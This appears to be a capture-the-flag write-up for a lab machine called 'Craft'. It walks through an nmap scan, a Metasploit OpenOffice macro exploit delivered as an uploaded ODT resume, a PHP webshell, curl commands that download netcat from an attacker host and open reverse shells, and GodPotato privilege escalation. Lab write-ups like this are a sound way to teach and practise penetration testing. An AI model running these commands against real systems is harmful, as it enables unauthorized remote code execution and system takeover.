Craft

Gaining Access

Nmap scan:

$ nmap -p- --min-rate 4000 192.168.197.169
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-05 23:30 +08
Nmap scan report for 192.168.197.169
Host is up (0.18s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http

OpenOffice Macros -> Shell

The HTTP site was a Lorem Ipsum website:

If we scroll down, we can see that there is a file upload for our 'resume'.

I tried to upload an image, and this triggered an error:

An ODT file is similar to a Microsoft Word document, which can be created using libreoffice. Seeing that we can only upload ODT files, this machine might have a script opening the files and being able to trigger some macros embedded within the file.

We can use msfconsole to generate this file:

msf6 exploit(multi/misc/openoffice_document_macro) > set LHOST tun0
LHOST => 192.168.45.197
msf6 exploit(multi/misc/openoffice_document_macro) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/openoffice_document_macro) > 
[*] Started reverse TCP handler on 192.168.45.197:4444 
[*] Using URL: http://192.168.45.197:8080/HugvG5t95RCfjWq
[*] Server started.
[*] Generating our odt file for Apache OpenOffice on Windows (PSH)...
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic/Standard
[*] Packaging file: Basic/Standard/Module1.xml
[*] Packaging file: Basic/Standard/script-lb.xml
[*] Packaging file: Basic/script-lc.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2/accelerator
[*] Packaging file: Configurations2/accelerator/current.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/META-INF
[*] Packaging file: META-INF/manifest.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Thumbnails
[*] Packaging file: Thumbnails/thumbnail.png
[*] Packaging file: content.xml
[*] Packaging file: manifest.rdf
[*] Packaging file: meta.xml
[*] Packaging file: mimetype
[*] Packaging file: settings.xml
[*] Packaging file: styles.xml
[+] msf.odt stored at /home/kali/.msf4/local/msf.odt

Afterwards, we can upload this file to the machine and wait for the script to open it:

[*] 192.168.197.169  openoffice_document_macro - Sending payload
[*] Command shell session 1 opened (192.168.45.197:5555 -> 192.168.197.169:49737) at 2023-07-05 23:39:11 +0800
msf6 exploit(multi/misc/openoffice_document_macro) > sessions

Active sessions
===============

  Id  Name  Type               Information                    Connection
  --  ----  ----               -----------                    ----------
  1         shell x64/windows  Shell Banner: Microsoft Windo  192.168.45.197:5555 -> 192.16
                               ws [Version 10.0.17763.2029]   8.197.169:49737 (192.168.197.
                               -----                          169)

Resume this sesison to drop into our shell:

Privilege Escalation

Apache User Shell

When checking the users present, we can see that there's an apache user:

 Directory of C:\Users

07/13/2021  03:35 AM    <DIR>          .
07/13/2021  03:35 AM    <DIR>          ..
05/28/2021  03:53 AM    <DIR>          Administrator
02/17/2023  03:36 PM    <DIR>          apache
05/28/2021  03:53 AM    <DIR>          Public
02/17/2023  03:36 PM    <DIR>          thecybergeek

The next step might be to get a shell as this user. Since there's a website being hosted on the machine, we can start there. I found that we can write to the webroot folder:

 Directory of C:\xampp\htdocs

07/13/2021  03:18 AM    <DIR>          .
07/13/2021  03:18 AM    <DIR>          ..
07/13/2021  03:18 AM    <DIR>          assets
07/13/2021  03:18 AM    <DIR>          css
07/07/2021  10:53 AM             9,635 index.php
07/13/2021  03:18 AM    <DIR>          js
07/07/2021  09:56 AM               835 upload.php
07/05/2023  08:38 AM    <DIR>          uploads
               2 File(s)         10,470 bytes
               6 Dir(s)  10,492,981,248 bytes free

C:\xampp\htdocs>echo hello > hello.txt
echo hello > hello.txt

As such, we can drop a cmd.php webshell within this file and verify that we have RCE as apache:

$ curl http://192.168.197.169/cmd.php?cmd=whoami
craft\apache

We can then download nc64.exe onto the machine and get a shell as apache:

$ curl -G --data-urlencode 'cmd=powershell -c wget 192.168.45.197/nc64.exe -Outfile C:/Windows/Tasks/nc.exe' http://192.168.197.169/cmd.php

$ curl -G --data-urlencode 'cmd=C:/Windows/Tasks/nc.exe -e cmd.exe 192.168.45.197 21' http://192.168.197.169/cmd.php

SeImpersonatePrivilege

This user has the SeImpersonatePrivilege enabled:

C:\xampp\htdocs>whoami /priv 
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeTcbPrivilege                Act as part of the operating system       Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

We can use godpotato.exe to exploit this:

C:\Windows\Tasks>.\godpotato.exe -cmd "cmd /c C:\Windows\Tasks\nc.exe -e cmd.exe 192.168.45.197 21"

Rooted!